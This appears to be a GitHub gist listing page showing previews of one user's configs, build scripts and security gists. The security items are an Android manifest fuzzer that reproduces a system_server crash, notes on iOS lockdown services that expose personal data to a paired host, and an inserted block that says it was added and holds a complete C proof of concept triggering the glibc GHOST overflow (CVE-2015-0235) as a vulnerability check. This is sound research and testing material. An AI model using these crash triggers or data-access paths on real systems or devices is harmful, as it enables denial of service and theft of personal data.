David Weinstein dweinstein
#!/bin/bash
# Basic setup for an Android application AndroidManifest fuzzer.
# This requires a pre-existing, ant-buildable application project; get the Android SDK and ant 1.8.
# This file reproduces the bug described at http://ibrahimbalic.com/2014/android-os-memory-corruption-bug/
# NOTE: values from 260000 and up cause SIGSEGVs in system_server (tested on KitKat 4.4.2).
# NOTE: watch `adb logcat` (or attach /system/bin/gdbserver) to see whether the device is still responsive and to catch the crash.
APP_PROJ_DIR="..."     # <-- path to the project dir
APP_PACKAGE_NAME="..." # <-- package name
APP_LAUNCH_COMP="..."  # <-- main activity name
@dweinstein
dweinstein / npm-qos-heuristic.md
Last active August 29, 2015 14:14 — forked from heapwolf/npm-qos-heuristic.md
general heuristics for ranking package quality node npm

Health

  • Has CI
  • Tests pass
  • Total number of breaking commits
  • Number of dependencies
  • Average age of issue
  • Frequency of issues fixed
  • Average response time of issues fixed to bugs filed
  • Last commit

# vim:ft=zsh ts=2 sw=2 sts=2
#
# agnoster's Theme - https://gist.github.com/3712874
# A Powerline-inspired theme for ZSH
#
# # README
#
# In order for this theme to render correctly, you will need a
# [Powerline-patched font](https://github.com/Lokaltog/powerline-fonts).
#
@dweinstein
dweinstein / .slate
Created January 3, 2014 14:17 — forked from lmullen/.slate
# GLOBAL CONFIGURATIONS
# -------------------------------------------------------------------
# See https://github.com/jigish/slate/wiki/Global-Configs
config defaultToCurrentScreen true
config secondsBeforeRepeat 0.4
config secondsBetweenRepeat 0.1
config keyboardLayout "qwerty"
config nudgePercentOf screenSize
config resizePercentOf screenSize
@dweinstein
dweinstein / forwarding-example.md
Created January 28, 2016 22:58 — forked from f1sherman/forwarding-example.md
Port Forwarding Example in OS X El Capitan

Add the following to /etc/pf.anchors/myname:

rdr pass on lo0 inet proto tcp from any to any port 80 -> 127.0.0.1 port 4000
rdr pass on lo0 inet proto tcp from any to any port 443 -> 127.0.0.1 port 4001

Add the following to /etc/pf-myname.conf:

rdr-anchor "forwarding"
load anchor "forwarding" from "/etc/pf.anchors/myname"
@dweinstein
dweinstein / build-libevent-ios.sh
Created February 1, 2016 03:38 — forked from ursachec/build-libevent-ios.sh
libevent build script for iOS
#!/bin/bash
set -u
# Setup architectures, library name and other vars + cleanup from previous runs
ARCHS=("armv7" "armv7s" "i386")
SDKS=("iphoneos" "iphoneos" "macosx")
LIB_NAME="libevent-2.0.21-stable"
TEMP_DIR="$(pwd)/tmp"
TEMP_LIB_PATH="$(pwd)/tmp/${LIB_NAME}"
@dweinstein
dweinstein / glibc-ghost-cve-2015-0236.c
Last active February 17, 2016 21:52 — forked from koelling/gist:ef9b2b9d0be6d6dbab63
glibc GHOST PoC for CVE-2015-0235
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
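The preview above stops inside the struct. What follows is a complete, runnable version added here, not the gist's own text: it keeps the canary layout and the name-length formula from the Qualys GHOST advisory (CVE-2015-0235; the 0236 in the gist filename is a typo) and wraps the check in a function so the verdict is returned rather than only printed. The function name ghost_check and its 0/1/2 return codes are this example's own convention.

```c
#define _GNU_SOURCE 1
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifndef __USE_MISC
/* Strict ISO C mode hides the GNU prototype; declare it ourselves. */
int gethostbyname_r(const char *, struct hostent *, char *, size_t,
                    struct hostent **, int *);
#endif

#define CANARY "in_the_coal_mine"

/* The canary sits directly after the buffer handed to gethostbyname_r().
 * On an unpatched glibc (fixed upstream in 2.18) __nss_hostname_digits_dots()
 * under-sizes its space check and writes sizeof(char *) bytes past the end of
 * buffer, i.e. into canary. */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

/* Returns 1 if the canary was clobbered (vulnerable), 0 if glibc rejected the
 * oversized name with ERANGE (patched), 2 if neither happened (inconclusive).
 * Function name and return codes are this example's own convention. */
int ghost_check(void)
{
    struct hostent resbuf;
    struct hostent *result;
    int herrno;
    int retval;

    /* Pick strlen(name) so that the buggy formula
     *   size_needed = sizeof(*host_addr) + sizeof(*h_addr_ptrs) + strlen(name) + 1
     * (host_addr is 16 bytes, h_addr_ptrs is two char pointers) exactly fills
     * the buffer. The fixed formula also counts sizeof(*h_alias_ptr), so it
     * needs more than 1024 bytes and fails with ERANGE instead of copying. */
    size_t len = sizeof(temp.buffer) - 16 * sizeof(unsigned char)
                 - 2 * sizeof(char *) - 1;
    char name[sizeof(temp.buffer)];

    /* A name that starts with a digit takes the numeric-literal path, so no
     * DNS or NSS lookup ever happens. */
    memset(name, '0', len);
    name[len] = '\0';

    retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                             &result, &herrno);

    if (strcmp(temp.canary, CANARY) != 0)
        return 1;   /* buffer overflowed into the canary: vulnerable */
    if (retval == ERANGE)
        return 0;   /* lookup refused for lack of space: not vulnerable */
    return 2;       /* neither outcome: inconclusive */
}

int main(void)
{
    static const char *verdict[] = { "not vulnerable", "vulnerable",
                                     "should not happen" };
    int rc = ghost_check();
    puts(verdict[rc]);
    return rc == 2 ? EXIT_FAILURE : EXIT_SUCCESS;
}
```

Compile with `cc -o ghost ghost.c` and run it on the host under test; a glibc older than 2.18 without the distribution's backported fix prints "vulnerable". Because the check only exercises the numeric-literal path it is safe to run offline and on production hosts: a patched libc returns ERANGE before touching the buffer, and the canary comparison catches the overflow independently of the return value.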
/*
* SEP firmware split tool
*
* Copyright (c) 2017 xerub
*/
#include <fcntl.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
@dweinstein
dweinstein / ios_lockdown_diag_services.md
Created June 19, 2018 04:15 — forked from ddz/ios_lockdown_diag_services.md
iOS Lockdown Diagnostic Services

TL;DR

  • Pairing an iOS device to a host (computer running iTunes) gives that host significant access to data on the iOS device and requires connecting the unlocked iOS device to a host over USB
  • Once paired, that host (or another host that has stolen its pairing record) can access significant amounts of user personal data from the iOS device over USB and Wi-Fi through the com.apple.mobile.file_relay and com.apple.mobile.house_arrest lockdown services
  • These services will not return user data files that are encrypted and locked by iOS Data Protection, but the files returned by file_relay are not protected by iOS Data Protection and include significant amounts of personal user data that would otherwise be encrypted in iTunes backups when "Encrypt Backup" is enabled
  • The com.apple.mobile.file_relay service is not used or referenced by any public Apple software so its intended client software is unknown outside of Apple
  • Apple released a [Knowledge Base article](https://support.apple.co
@dweinstein
dweinstein / xctesting_in_repl_or_script.swift
Last active September 6, 2018 15:49 — forked from lzell/xctesting_in_repl_or_script.swift
Using XCTest in the swift repl or standalone script
// Start repl with:
// $ xcrun swift -F /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/
// Or run as script:
// $ xcrun swift -F /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/ %
import Foundation
if dlopen("/Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/Library/Frameworks/XCTest.framework/XCTest", RTLD_NOW) == nil {